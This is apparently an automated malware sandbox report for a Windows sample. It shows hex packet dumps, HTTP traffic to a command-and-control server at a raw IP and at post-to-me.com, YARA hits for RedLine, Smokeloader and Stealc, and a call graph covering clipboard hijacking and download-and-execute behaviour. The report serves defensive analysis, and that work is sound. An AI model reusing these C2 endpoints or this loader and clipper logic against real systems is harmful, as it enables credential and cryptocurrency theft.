                                                    Nov 26, 2024 22:47:11.805627108 CET1236INData Raw: 06 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 11 e7 ff ff 8b 4e 0c 8b 56 08 03 cf 33 0c 3a e8 01 e7 ff ff 8b 45 f0 8b 48 08 8b d7 e8 25 27 00 00 ba fe ff ff ff 39 53 0c 0f 84 52 ff ff ff 68 08 70 43 00 57 8b cb e8 3d 27 00 00 e9 1c ff ff ff 6a 0c
                                                    Data Ascii: tN38NV3:EH%'9SRhpCW='jhVCM3;v.jX3;E@uWWWWWr3Mu;u3F3]wi=RuKuE;Rw7jY}uYEE_];t
                                                    Nov 26, 2024 22:47:11.805632114 CET1236INData Raw: ff 55 8b ec 8b 45 08 b9 60 73 43 00 3b c1 72 1f 3d c0 75 43 00 77 18 81 60 0c ff 7f ff ff 2b c1 c1 f8 05 83 c0 10 50 e8 97 ed ff ff 59 5d c3 83 c0 20 50 ff 15 e8 40 43 00 5d c3 8b ff 55 8b ec 8b 4d 08 83 f9 14 8b 45 0c 7d 13 81 60 0c ff 7f ff ff
                                                    Data Ascii: UE`sC;r=uCw`+PY] P@C]UME}`QhY] P@C]jThVC3}EP@CEj@j ^VYY;A5pA0@@x@$@%@&x8@4@A;rf9}
                                                    Nov 26, 2024 22:47:11.806272984 CET1236INData Raw: 8b ff 55 8b ec 83 ec 14 56 57 ff 75 08 8d 4d ec e8 64 ff ff ff 8b 45 10 8b 75 0c 33 ff 3b c7 74 02 89 30 3b f7 75 2c e8 a8 e7 ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 17 ff ff ff 83 c4 14 80 7d f8 00 74 07 8b 45 f4 83 60 70 fd 33 c0 e9 d8 01 00
                                                    Data Ascii: UVWuMdEu3;t0;u,WWWWW}tE`p39}t}|}$MS}~~EPjPE.MBtG-uM+uGEKB$9u*0tE4<xt<X
                                                    Nov 26, 2024 22:47:11.924596071 CET1236INData Raw: 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 f0 37 40 00 8d 49 00 a4 37 40 00 ac 37 40 00 b4 37 40 00 bc 37 40 00 c4 37 40 00 cc 37 40 00 d4 37 40 00 e7 37 40 00 8b 44 8e 1c 89 44
                                                    Data Ascii: FGFGV$7@I7@7@7@7@7@7@7@7@DDDDDDDDDDDDDD$7@8@8@8@,8@E^_FGE^_IFGFGE^_FGFGFGE^_UV


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.44973892.255.57.88807532C:\Users\user\AppData\Local\Temp\ED60.tmp.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 26, 2024 22:47:27.585395098 CET87OUTGET / HTTP/1.1
                                                    Host: 92.255.57.88
                                                    Connection: Keep-Alive
                                                    Cache-Control: no-cache
                                                    Nov 26, 2024 22:47:28.971765995 CET203INHTTP/1.1 200 OK
                                                    Date: Tue, 26 Nov 2024 21:47:28 GMT
                                                    Server: Apache/2.4.58 (Ubuntu)
                                                    Content-Length: 0
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: text/html; charset=UTF-8
                                                    Nov 26, 2024 22:47:28.978765965 CET415OUTPOST /7bbacc20a3bd2eb5.php HTTP/1.1
                                                    Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJ
                                                    Host: 92.255.57.88
                                                    Content-Length: 216
                                                    Connection: Keep-Alive
                                                    Cache-Control: no-cache
                                                    Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 30 32 46 43 31 36 35 32 39 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 35 35 31 34 38 38 34 31 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 2d 2d 0d 0a
                                                    Data Ascii: ------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="hwid"102FC16529061437788654------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="build"551488411------IJKFHDBKFCAAECBFIDHJ--
                                                    Nov 26, 2024 22:47:29.433871984 CET210INHTTP/1.1 200 OK
                                                    Date: Tue, 26 Nov 2024 21:47:29 GMT
                                                    Server: Apache/2.4.58 (Ubuntu)
                                                    Content-Length: 8
                                                    Keep-Alive: timeout=5, max=99
                                                    Connection: Keep-Alive
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 59 6d 78 76 59 32 73 3d
                                                    Data Ascii: YmxvY2s=


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449730172.67.179.2074437356C:\Users\user\Desktop\6X4BIzTTBR.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 21:47:09 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                    User-Agent: ShareScreen
                                                    Host: post-to-me.com
                                                    2024-11-26 21:47:10 UTC780INHTTP/1.1 200 OK
                                                    Date: Tue, 26 Nov 2024 21:47:10 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JaVAHyAaPznb7RC2EtTwjWwYljh4e8COwhZO4dEL1TLU%2BqNiOp%2FFcCEhuFsKgq9qWftb2f3wBmi%2FvLnTIKlroHGs387xMvmtKH%2FKNw%2FlXzFG7nHVOmzrcVyop4RM%2B4oaAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e8d134a3f5f7ce4-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1808&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4208&recv_bytes=728&delivery_rate=165307&cwnd=223&unsent_bytes=0&cid=0e7483b1062c442f&ts=718&x=0"
                                                    2024-11-26 21:47:10 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                    Data Ascii: 2ok
                                                    2024-11-26 21:47:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:16:46:55
                                                    Start date:26/11/2024
                                                    Path:C:\Users\user\Desktop\6X4BIzTTBR.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\6X4BIzTTBR.exe"
                                                    Imagebase:0x400000
                                                    File size:413'184 bytes
                                                    MD5 hash:5A45CFE0B266362B482CACE7205C2C32
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4091760416.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:false

                                                    General

                                                    Target ID:1
                                                    Start time:16:47:11
                                                    Start date:26/11/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\ED60.tmp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\ED60.tmp.exe"
                                                    Imagebase:0x400000
                                                    File size:286'208 bytes
                                                    MD5 hash:A969307FDB2862755469583A5D9BEA48
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2250272597.0000000002D6C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1957434387.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 34%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:16:47:30
                                                    Start date:26/11/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7532 -s 1288
                                                    Imagebase:0x990000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:2.1%
                                                      Dynamic/Decrypted Code Coverage:3.8%
                                                      Signature Coverage:5.8%
                                                      Total number of Nodes:739
                                                      Total number of Limit Nodes:22
                                                      execution_graph 63734 46d003c 63735 46d0049 63734->63735 63749 46d0e0f SetErrorMode SetErrorMode 63735->63749 63740 46d0265 63741 46d02ce VirtualProtect 63740->63741 63743 46d030b 63741->63743 63742 46d0439 VirtualFree 63746 46d05f4 LoadLibraryA 63742->63746 63748 46d04be 63742->63748 63743->63742 63744 46d04e3 LoadLibraryA 63744->63748 63747 46d08c7 63746->63747 63748->63744 63748->63746 63750 46d0223 63749->63750 63751 46d0d90 63750->63751 63752 46d0dad 63751->63752 63753 46d0dbb GetPEB 63752->63753 63754 46d0238 VirtualAlloc 63752->63754 63753->63754 63754->63740 63755 404ba4 63756 404bb0 Concurrency::details::ThreadScheduler::Create 63755->63756 63761 40fb22 63756->63761 63760 404bd0 error_info_injector Concurrency::details::ThreadScheduler::Create 63764 40fb27 63761->63764 63763 404bb9 63769 4051e6 63763->63769 63764->63763 63766 40fb43 Concurrency::details::ThreadScheduler::Create 63764->63766 63785 42ad8e 63764->63785 63792 42f460 7 API calls 2 library calls 63764->63792 63793 42861d RaiseException 63766->63793 63768 4103dc 63770 4051f2 __Cnd_init Concurrency::details::ThreadScheduler::Create 63769->63770 63773 40520a __Mtx_init 63770->63773 63804 40ce48 28 API calls std::_Throw_Cpp_error 63770->63804 63772 405231 63796 4010ea 63772->63796 63773->63772 63805 40ce48 28 API calls std::_Throw_Cpp_error 63773->63805 63779 405280 63781 405295 error_info_injector 63779->63781 63807 401128 28 API calls 2 library calls 63779->63807 63808 401109 63781->63808 63784 4052ba Concurrency::details::ThreadScheduler::Create 63784->63760 63790 4336b7 std::_Locinfo::_Locinfo_dtor 63785->63790 63786 4336f5 63795 42ead9 20 API calls __dosmaperr 63786->63795 63787 4336e0 RtlAllocateHeap 63789 4336f3 63787->63789 63787->63790 63789->63764 63790->63786 63790->63787 63794 42f460 7 API calls 2 library calls 63790->63794 63792->63764 63793->63768 63794->63790 63795->63789 63812 40d329 63796->63812 63799 401103 63801 40cf09 63799->63801 63844 42e124 63801->63844 63804->63773 63805->63772 63806 40ce48 28 API calls std::_Throw_Cpp_error 63806->63779 63807->63779 63809 401115 __Mtx_unlock 63808->63809 63810 401122 63809->63810 64179 40ce48 28 API calls std::_Throw_Cpp_error 63809->64179 63810->63784 63816 40d083 63812->63816 63815 40ce48 28 API calls std::_Throw_Cpp_error 63815->63799 63817 40d0d9 63816->63817 63818 40d0ab GetCurrentThreadId 63816->63818 63820 40d103 63817->63820 63821 40d0dd GetCurrentThreadId 63817->63821 63819 40d0b6 GetCurrentThreadId 63818->63819 63830 40d0d1 63818->63830 63819->63830 63822 40d19c GetCurrentThreadId 63820->63822 63825 40d123 63820->63825 63823 40d0ec 63821->63823 63822->63823 63824 40d1f3 GetCurrentThreadId 63823->63824 63823->63830 63824->63830 63841 40e945 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 63825->63841 63829 4010f6 63829->63799 63829->63815 63834 40f8e5 63830->63834 63831 40d15b GetCurrentThreadId 63831->63823 63832 40d12e __Xtime_diff_to_millis2 63831->63832 63832->63823 63832->63830 63832->63831 63842 40e945 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 63832->63842 63835 40f8f0 IsProcessorFeaturePresent 63834->63835 63836 40f8ee 63834->63836 63838 40f963 63835->63838 63836->63829 63843 40f927 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 63838->63843 63840 40fa46 63840->63829 63841->63832 63842->63832 63843->63840 63845 42e131 63844->63845 63846 42e145 63844->63846 63867 42ead9 20 API calls __dosmaperr 63845->63867 63858 42e0db 63846->63858 63849 42e136 63868 42a5ad 26 API calls _Deallocate 63849->63868 63851 42e15a CreateThread 63853 42e179 GetLastError 63851->63853 63857 42e185 63851->63857 63896 42dfd0 63851->63896 63869 42eaa3 20 API calls __dosmaperr 63853->63869 63854 40526d 63854->63779 63854->63806 63870 42e04d 63857->63870 63878 434d3a 63858->63878 63862 42e0f4 63863 42e113 63862->63863 63864 42e0fb GetModuleHandleExW 63862->63864 63865 42e04d __Thrd_start 22 API calls 63863->63865 63864->63863 63866 42e11d 63865->63866 63866->63851 63866->63857 63867->63849 63868->63854 63869->63857 63871 42e05a 63870->63871 63872 42e07e 63870->63872 63873 42e060 CloseHandle 63871->63873 63874 42e069 63871->63874 63872->63854 63873->63874 63875 42e078 63874->63875 63876 42e06f FreeLibrary 63874->63876 63877 43347a _free 20 API calls 63875->63877 63876->63875 63877->63872 63879 434d47 63878->63879 63880 434d87 63879->63880 63881 434d72 HeapAlloc 63879->63881 63885 434d5b std::_Locinfo::_Locinfo_dtor 63879->63885 63894 42ead9 20 API calls __dosmaperr 63880->63894 63882 434d85 63881->63882 63881->63885 63884 42e0eb 63882->63884 63887 43347a 63884->63887 63885->63880 63885->63881 63893 42f460 7 API calls 2 library calls 63885->63893 63888 433485 RtlFreeHeap 63887->63888 63892 4334ae __dosmaperr 63887->63892 63889 43349a 63888->63889 63888->63892 63895 42ead9 20 API calls __dosmaperr 63889->63895 63891 4334a0 GetLastError 63891->63892 63892->63862 63893->63885 63894->63884 63895->63891 63897 42dfdc _Atexit 63896->63897 63898 42dfe3 GetLastError ExitThread 63897->63898 63899 42dff0 63897->63899 63912 431eea GetLastError 63899->63912 63901 42dff5 63932 435581 63901->63932 63904 42e00b 63939 401169 63904->63939 63913 431f00 63912->63913 63914 431f06 63912->63914 63947 435121 11 API calls 2 library calls 63913->63947 63916 434d3a std::_Locinfo::_Locinfo_dtor 20 API calls 63914->63916 63918 431f55 SetLastError 63914->63918 63917 431f18 63916->63917 63919 431f20 63917->63919 63948 435177 11 API calls 2 library calls 63917->63948 63918->63901 63921 43347a _free 20 API calls 63919->63921 63923 431f26 63921->63923 63922 431f35 63922->63919 63924 431f3c 63922->63924 63925 431f61 SetLastError 63923->63925 63949 431d5c 20 API calls __Getcvt 63924->63949 63950 42df8d 167 API calls 2 library calls 63925->63950 63927 431f47 63929 43347a _free 20 API calls 63927->63929 63931 431f4e 63929->63931 63930 431f6d 63931->63918 63931->63925 63933 4355a6 63932->63933 63934 43559c 63932->63934 63951 434ea3 5 API calls 2 library calls 63933->63951 63936 40f8e5 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 63934->63936 63937 42e000 63936->63937 63937->63904 63946 4354b4 10 API calls 2 library calls 63937->63946 63938 4355bd 63938->63934 63952 405816 63939->63952 63965 40155a Sleep 63939->63965 63940 401173 63943 42e1a9 63940->63943 64147 42e084 63943->64147 63945 42e1b6 63946->63904 63947->63914 63948->63922 63949->63927 63950->63930 63951->63938 63953 405822 Concurrency::details::ThreadScheduler::Create 63952->63953 63954 4010ea std::_Cnd_initX 35 API calls 63953->63954 63956 405837 __Cnd_signal 63954->63956 63955 40584f 63958 401109 std::_Cnd_initX 28 API calls 63955->63958 63956->63955 64011 40ce48 28 API calls std::_Throw_Cpp_error 63956->64011 63959 405858 63958->63959 63967 4016e3 63959->63967 63988 402a05 InternetOpenW 63959->63988 63962 40585f error_info_injector Concurrency::details::ThreadScheduler::Create 63962->63940 63966 4016d9 63965->63966 64012 40fdfc 63967->64012 63969 4016ef Sleep 64013 40cc26 63969->64013 63972 40cc26 28 API calls 63973 401715 63972->63973 63974 40171f OpenClipboard 63973->63974 63975 401947 Sleep 63974->63975 63976 40172f GetClipboardData 63974->63976 63975->63974 63977 401941 CloseClipboard 63976->63977 63978 40173f GlobalLock 63976->63978 63977->63975 63978->63977 63979 40174c _strlen 63978->63979 63979->63977 63980 40cbdd 28 API calls std::system_error::system_error 63979->63980 63981 40cc26 28 API calls 63979->63981 63983 4018d6 EmptyClipboard GlobalAlloc 63979->63983 64017 402e7c 167 API calls 2 library calls 63979->64017 64019 40cabc 26 API calls _Deallocate 63979->64019 63980->63979 63981->63979 63983->63979 63984 4018ef GlobalLock 63983->63984 64018 4269a0 63984->64018 63987 401909 GlobalUnlock SetClipboardData GlobalFree 63987->63979 63989 402a38 InternetOpenUrlW 63988->63989 63990 402bad 63988->63990 63989->63990 63991 402a4e GetTempPathW GetTempFileNameW 63989->63991 63993 40f8e5 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 63990->63993 64025 42a89e 63991->64025 63995 402bbc 63993->63995 64004 40e781 63995->64004 63996 402b9c InternetCloseHandle InternetCloseHandle 63996->63990 63997 402ab9 ___scrt_fastfail 63998 402ad1 InternetReadFile WriteFile 63997->63998 63999 402b11 CloseHandle 63997->63999 63998->63997 64027 402971 63999->64027 64002 402b3c ShellExecuteExW 64002->63996 64003 402b83 WaitForSingleObject CloseHandle 64002->64003 64003->63996 64138 40df00 64004->64138 64009 40e826 64009->63962 64010 40e798 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 64145 40df0c LeaveCriticalSection std::_Lockit::~_Lockit 64010->64145 64011->63955 64012->63969 64014 40cc42 _strlen 64013->64014 64020 40cbdd 64014->64020 64016 401708 64016->63972 64017->63979 64018->63987 64019->63979 64021 40cc10 64020->64021 64022 40cbec BuildCatchObjectHelperInternal 64020->64022 64021->64022 64024 40cb72 28 API calls 4 library calls 64021->64024 64022->64016 64024->64022 64026 402a87 CreateFileW 64025->64026 64026->63996 64026->63997 64028 40299c _wcslen ___scrt_fastfail 64027->64028 64037 42b464 64028->64037 64032 4029c9 64059 404349 64032->64059 64035 40f8e5 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 64036 402a03 64035->64036 64036->63996 64036->64002 64063 42b116 64037->64063 64040 402834 64041 402843 Concurrency::details::ThreadScheduler::Create 64040->64041 64089 4032f3 64041->64089 64043 402857 64105 403ba1 64043->64105 64045 40286b 64046 402899 64045->64046 64047 40287d 64045->64047 64111 403128 64046->64111 64132 4032b0 167 API calls 64047->64132 64050 4028a6 64114 403c36 64050->64114 64052 4028b8 64124 403cd8 64052->64124 64054 402890 std::ios_base::_Ios_base_dtor Concurrency::details::ThreadScheduler::Create 64054->64032 64055 4028d5 64056 404349 26 API calls 64055->64056 64057 4028f4 64056->64057 64133 4032b0 167 API calls 64057->64133 64060 404351 64059->64060 64061 4029f5 64059->64061 64134 40ccac 64060->64134 64061->64035 64064 42b143 64063->64064 64065 42b152 64064->64065 64066 42b16a 64064->64066 64078 42b147 64064->64078 64067 42ead9 __dosmaperr 20 API calls 64065->64067 64068 42a757 __fassign 162 API calls 64066->64068 64070 42b157 64067->64070 64071 42b175 64068->64071 64069 40f8e5 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 64072 4029b5 64069->64072 64073 42a5ad __wsopen_s 26 API calls 64070->64073 64074 42b180 64071->64074 64075 42b317 64071->64075 64072->64040 64073->64078 64077 42b228 WideCharToMultiByte 64074->64077 64081 42b18b 64074->64081 64086 42b1c5 WideCharToMultiByte 64074->64086 64076 42b344 WideCharToMultiByte 64075->64076 64079 42b322 64075->64079 64076->64079 64077->64081 64082 42b253 64077->64082 64078->64069 64079->64078 64083 42ead9 __dosmaperr 20 API calls 64079->64083 64081->64078 64085 42ead9 __dosmaperr 20 API calls 64081->64085 64082->64081 64084 42b25c GetLastError 64082->64084 64083->64078 64084->64081 64088 42b26b 64084->64088 64085->64078 64086->64081 64087 42b284 WideCharToMultiByte 64087->64079 64087->64088 64088->64078 64088->64079 64088->64087 64090 4032ff Concurrency::details::ThreadScheduler::Create 64089->64090 64091 404692 167 API calls 64090->64091 64092 40332b 64091->64092 64093 404863 167 API calls 64092->64093 64094 403354 64093->64094 64095 4045a2 26 API calls 64094->64095 64096 403363 64095->64096 64097 40ddf9 167 API calls 64096->64097 64104 4033a8 std::ios_base::_Ios_base_dtor 64096->64104 64099 403378 64097->64099 64098 4033e4 Concurrency::details::ThreadScheduler::Create 64098->64043 64101 4045a2 26 API calls 64099->64101 64099->64104 64100 40c62e 167 API calls 64100->64098 64102 403389 64101->64102 64103 404c2a 167 API calls 64102->64103 64103->64104 64104->64098 64104->64100 64106 403bad Concurrency::details::ThreadScheduler::Create 64105->64106 64107 4042c5 167 API calls 64106->64107 64108 403bb9 64107->64108 64109 403bdd Concurrency::details::ThreadScheduler::Create 64108->64109 64110 403511 167 API calls 64108->64110 64109->64045 64110->64109 64112 40436c 28 API calls 64111->64112 64113 403142 ___scrt_fastfail 64112->64113 64113->64050 64115 403c42 Concurrency::details::ThreadScheduler::Create 64114->64115 64116 40c62e 167 API calls 64115->64116 64117 403c65 64116->64117 64118 4042c5 167 API calls 64117->64118 64119 403c6f 64118->64119 64120 403cb2 Concurrency::details::ThreadScheduler::Create 64119->64120 64123 403511 167 API calls 64119->64123 64120->64052 64121 403c90 64121->64120 64122 4046e0 167 API calls 64121->64122 64122->64120 64123->64121 64125 403ce4 __EH_prolog3_catch 64124->64125 64126 4042c5 167 API calls 64125->64126 64127 403cfd 64126->64127 64129 403d2d 64127->64129 64131 4036b5 40 API calls 64127->64131 64128 4046e0 167 API calls 64130 403d86 Concurrency::details::ThreadScheduler::Create 64128->64130 64129->64128 64130->64055 64131->64129 64132->64054 64133->64054 64135 40ccb9 64134->64135 64136 40ccc6 error_info_injector 64134->64136 64137 40cc88 _Deallocate 26 API calls 64135->64137 64136->64061 64137->64136 64146 40f240 EnterCriticalSection 64138->64146 64140 40df0a 64141 40ceaf GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 64140->64141 64142 40cee8 64141->64142 64143 40cedd CloseHandle 64141->64143 64144 40ceec GetCurrentThreadId 64142->64144 64143->64144 64144->64010 64145->64009 64146->64140 64156 431f6e GetLastError 64147->64156 64149 42e093 ExitThread 64150 42e0b1 64153 42e0c4 64150->64153 64154 42e0bd CloseHandle 64150->64154 64153->64149 64155 42e0d0 FreeLibraryAndExitThread 64153->64155 64154->64153 64157 431f87 64156->64157 64160 431f8d 64156->64160 64176 435121 11 API calls 2 library calls 64157->64176 64159 434d3a std::_Locinfo::_Locinfo_dtor 17 API calls 64161 431f9f 64159->64161 64160->64159 64162 431fe4 SetLastError 64160->64162 64163 431fa7 64161->64163 64177 435177 11 API calls 2 library calls 64161->64177 64165 42e08f 64162->64165 64166 43347a _free 17 API calls 64163->64166 64165->64149 64165->64150 64175 435506 10 API calls 2 library calls 64165->64175 64168 431fad 64166->64168 64167 431fbc 64167->64163 64169 431fc3 64167->64169 64170 431fdb SetLastError 64168->64170 64178 431d5c 20 API calls __Getcvt 64169->64178 64170->64165 64172 431fce 64173 43347a _free 17 API calls 64172->64173 64174 431fd4 64173->64174 64174->64162 64174->64170 64175->64150 64176->64160 64177->64167 64178->64172 64179->63810 64180 402c15 InternetOpenW 64181 402e6b 64180->64181 64184 402c48 ___scrt_fastfail 64180->64184 64182 40f8e5 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 64181->64182 64183 402e7a 64182->64183 64192 42df0d 64184->64192 64187 42df0d std::_Locinfo::_Locinfo_dtor 26 API calls 64188 402e2d 64187->64188 64189 42df0d std::_Locinfo::_Locinfo_dtor 26 API calls 64188->64189 64190 402e3f InternetOpenUrlW 64189->64190 64190->64181 64191 402e5a InternetCloseHandle InternetCloseHandle 64190->64191 64191->64181 64193 42df2a 64192->64193 64196 42df1c 64192->64196 64201 42ead9 20 API calls __dosmaperr 64193->64201 64195 42df34 64202 42a5ad 26 API calls _Deallocate 64195->64202 64196->64193 64199 42df5a 64196->64199 64198 402e1f 64198->64187 64199->64198 64203 42ead9 20 API calls __dosmaperr 64199->64203 64201->64195 64202->64198 64203->64195 64204 432795 64209 432563 64204->64209 64208 4327bd 64214 43258e 64209->64214 64211 432781 64228 42a5ad 26 API calls _Deallocate 64211->64228 64213 4326e0 64213->64208 64221 43d02c 64213->64221 64217 4326d7 64214->64217 64224 43c8de 170 API calls 2 library calls 64214->64224 64216 432721 64216->64217 64225 43c8de 170 API calls 2 library calls 64216->64225 64217->64213 64227 42ead9 20 API calls __dosmaperr 64217->64227 64219 432740 64219->64217 64226 43c8de 170 API calls 2 library calls 64219->64226 64229 43ca01 64221->64229 64223 43d047 64223->64208 64224->64216 64225->64219 64226->64217 64227->64211 64228->64213 64230 43ca0d ___BuildCatchObject 64229->64230 64231 43ca1b 64230->64231 64233 43ca54 64230->64233 64247 42ead9 20 API calls __dosmaperr 64231->64247 64240 43cfdb 64233->64240 64234 43ca20 64248 42a5ad 26 API calls _Deallocate 64234->64248 64239 43ca2a std::_Locinfo::_Locinfo_dtor 64239->64223 64250 43f951 64240->64250 64243 43ca78 64249 43caa1 LeaveCriticalSection __wsopen_s 64243->64249 64246 43347a _free 20 API calls 64246->64243 64247->64234 64248->64239 64249->64239 64251 43f974 64250->64251 64252 43f95d 64250->64252 64253 43f993 64251->64253 64254 43f97c 64251->64254 64320 42ead9 20 API calls __dosmaperr 64252->64320 64324 434fba 10 API calls 2 library calls 64253->64324 64322 42ead9 20 API calls __dosmaperr 64254->64322 64258 43f962 64321 42a5ad 26 API calls _Deallocate 64258->64321 64260 43f981 64323 42a5ad 26 API calls _Deallocate 64260->64323 64261 43f99a MultiByteToWideChar 64263 43f9c9 64261->64263 64264 43f9b9 GetLastError 64261->64264 64326 4336b7 21 API calls 3 library calls 64263->64326 64325 42eaa3 20 API calls __dosmaperr 64264->64325 64267 43f9d1 64269 43f9f9 64267->64269 64270 43f9d8 MultiByteToWideChar 64267->64270 64268 43cff1 64268->64243 64274 43d04c 64268->64274 64272 43347a _free 20 API calls 64269->64272 64270->64269 64271 43f9ed GetLastError 64270->64271 64327 42eaa3 20 API calls __dosmaperr 64271->64327 64272->64268 64275 43d069 64274->64275 64276 43d097 64275->64276 64277 43d07e 64275->64277 64328 43978e 64276->64328 64342 42eac6 20 API calls __dosmaperr 64277->64342 64280 43d09c 64281 43d0a5 64280->64281 64282 43d0bc 64280->64282 64344 42eac6 20 API calls __dosmaperr 64281->64344 64341 43cd1a CreateFileW 64282->64341 64286 43d0aa 64345 42ead9 20 API calls __dosmaperr 64286->64345 64287 43d019 64287->64246 64289 43d172 GetFileType 64291 43d1c4 64289->64291 64292 43d17d GetLastError 64289->64292 64290 43d0f5 64290->64289 64294 43d147 GetLastError 64290->64294 64346 43cd1a CreateFileW 64290->64346 64350 4396d7 21 API calls 2 library calls 64291->64350 64348 42eaa3 20 API calls __dosmaperr 64292->64348 64293 43d083 64343 42ead9 20 API calls __dosmaperr 64293->64343 64347 42eaa3 20 API calls __dosmaperr 64294->64347 64297 43d18b CloseHandle 64297->64293 64299 43d1b4 64297->64299 64349 42ead9 20 API calls __dosmaperr 64299->64349 64301 43d13a 64301->64289 64301->64294 64302 43d1e5 64304 43d231 64302->64304 64351 43cf2b 169 API calls 3 library calls 64302->64351 64309 43d25e 64304->64309 64352 43cacd 167 API calls 4 library calls 64304->64352 64305 43d1b9 64305->64293 64308 43d257 64308->64309 64310 43d26f 64308->64310 64353 4335dd 29 API calls 2 library calls 64309->64353 64310->64287 64312 43d2ed CloseHandle 64310->64312 64354 43cd1a 